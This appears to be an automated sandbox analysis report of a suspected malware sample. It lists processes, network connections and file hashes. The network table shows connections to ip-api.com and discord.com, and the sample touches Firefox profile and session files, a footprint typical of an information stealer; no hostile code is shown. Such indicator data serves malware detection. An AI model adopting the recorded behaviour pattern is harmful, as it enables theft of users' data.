"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.4.1952288116\747886228" -childID 3 -isForBrowser -prefsHandle 3748 -prefMapHandle 3744 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c14ca384-ee08-4fd3-8057-43ca1bd39950} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3756 1df07e85b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.7.1132847867\1865472999" -childID 6 -isForBrowser -prefsHandle 5428 -prefMapHandle 5432 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e332107-18c7-4734-bb44-6d99446ff352} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 5420 1df0b7eb358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.6.1523941693\944289078" -childID 5 -isForBrowser -prefsHandle 5236 -prefMapHandle 5240 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb136331-fd05-4d8c-90c0-49cb8964b8b1} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 5180 1df0b7ea158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.5.81357428\865242096" -childID 4 -isForBrowser -prefsHandle 5096 -prefMapHandle 5080 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0c4b860-41e7-4d64-a977-b3e41461aea3} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 5104 1df09430d58 tab
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
C:\Windows\system32\SearchProtocolHost.exe
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
C:\Windows\system32\SearchFilterHost.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 788
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.245.36.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| NL | 142.250.179.131:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.211.247.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:60553 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 44.239.75.237:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 93.243.107.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.75.239.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:60560 | tcp |
Files
memory/3660-0-0x000001EB88C20000-0x000001EB88C80000-memory.dmp
memory/3660-1-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/3660-2-0x000001EBA32B0000-0x000001EBA32C0000-memory.dmp
memory/1756-3-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/1756-4-0x000002DABEC00000-0x000002DABEC10000-memory.dmp
memory/1756-14-0x000002DABEB70000-0x000002DABEB92000-memory.dmp
memory/1756-15-0x000002DABEC00000-0x000002DABEC10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vti25erf.ntz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1756-16-0x000002DABEC00000-0x000002DABEC10000-memory.dmp
memory/1756-17-0x000002DABEC00000-0x000002DABEC10000-memory.dmp
memory/1756-20-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4700-27-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/4700-32-0x000001A465A90000-0x000001A465AA0000-memory.dmp
memory/4700-33-0x000001A465A90000-0x000001A465AA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/4700-36-0x000001A465A90000-0x000001A465AA0000-memory.dmp
memory/3660-35-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/4700-38-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/3660-40-0x000001EBA33C0000-0x000001EBA3436000-memory.dmp
memory/3660-41-0x000001EB8A8F0000-0x000001EB8A940000-memory.dmp
memory/3600-42-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/3600-44-0x0000024ECBD40000-0x0000024ECBD50000-memory.dmp
memory/3660-43-0x000001EBA32B0000-0x000001EBA32C0000-memory.dmp
memory/3660-54-0x000001EB8A8C0000-0x000001EB8A8DE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0e046a2ca47c01116ab2c42b4553232c |
| SHA1 | 750650547f305d5cd7f832341f6a17618aa98800 |
| SHA256 | d063753bbc9924e4bf9306167893909c3898072109e13b479ccdac493a8f3a2d |
| SHA512 | dc1c95dbb27fb1fcc577a841abad5a2ca16445b1c51640853f497df8fca260ae5d5fee2d402b18c61a263a6af5a5b71661fb880234bd8de3e6636887f03ae0df |
memory/3600-57-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/2148-58-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/2148-59-0x000001E6AD030000-0x000001E6AD040000-memory.dmp
memory/2148-60-0x000001E6AD030000-0x000001E6AD040000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d3235ed022a42ec4338123ab87144afa |
| SHA1 | 5058608bc0deb720a585a2304a8f7cf63a50a315 |
| SHA256 | 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27 |
| SHA512 | 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf |
memory/2148-84-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/3660-85-0x000001EB8A8E0000-0x000001EB8A8EA000-memory.dmp
memory/3660-86-0x000001EB8A960000-0x000001EB8A972000-memory.dmp
memory/688-98-0x000002406B930000-0x000002406B940000-memory.dmp
memory/688-88-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2f995e50613f828ddc321e8d37fdb01a |
| SHA1 | b0883951336ac0719c4927eb03d2577b8475931a |
| SHA256 | 7360aa4436f23a39cb14e9cc053c85a4f35e4258c0b9b7b6c89c7e996c3f7f32 |
| SHA512 | 39f75d156e6e4c0cdc7f15afc38983b4139ed0b033433b3271cca639722a7dbb87a455c36c077f34153c7128e2851e93a9c2ce2f3af03874d390a6cee607491d |
memory/688-99-0x000002406B930000-0x000002406B940000-memory.dmp
memory/688-101-0x000002406B930000-0x000002406B940000-memory.dmp
memory/688-103-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
memory/3660-107-0x00007FFEBBBE0000-0x00007FFEBC6A1000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gcdxm1e2.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 62402db70e588065dad628041e8df19d |
| SHA1 | 3e4070fb47abe496f74fb2b65a37463ccdc20339 |
| SHA256 | 5028966d2f2c8d5ce6a84d1eb6b0d8487b1b07d9cbee06e71e9d6b1abcabfd31 |
| SHA512 | b87d9c3f89af660a20654c870e593e1de416b4ee0fc2d5b2e4f2fa35c463e89920a1a50ca737f02b6eae813b418af49d7c7c1b8a64c1b97c8bb7f6cbe3f24a96 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gcdxm1e2.default-release\prefs.js
| MD5 | b3cba0a654c5e568b39c86ab891d0bc2 |
| SHA1 | bf2abb80435b9c574cb0559eaa1f147631828fec |
| SHA256 | 95e575782062b521c29a1df7f03961118fcb7348e5872f458680ef1eaf65b411 |
| SHA512 | 4341938d6b4f0c145ea56557bc21b1e20e91c3d690f21131ca236453fbb6e895da4140bea607052b0d8cdd193e342301ffdc58db849c8de10c1ec9d9ec74f0de |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gcdxm1e2.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 8370e84d3959344d9998f5753c024f65 |
| SHA1 | 8710569fb014a05d380682996a947cc6034fc821 |
| SHA256 | f03115f7112583de26ae554f4b25fd43704a1c22ea346fe7a4fc5a9eb5cba4f9 |
| SHA512 | d5cded9a07d9698a8515dbaca522d0aa7150f6325b268a4ad7a3b2e90fb717f3b612f1bea759429a1ea4b00a0520b890a34292b90286ff613f782bce93654120 |
memory/2300-173-0x000001DC54640000-0x000001DC54650000-memory.dmp
memory/2300-189-0x000001DC58B30000-0x000001DC58B38000-memory.dmp
memory/2300-193-0x000001DC5A190000-0x000001DC5A198000-memory.dmp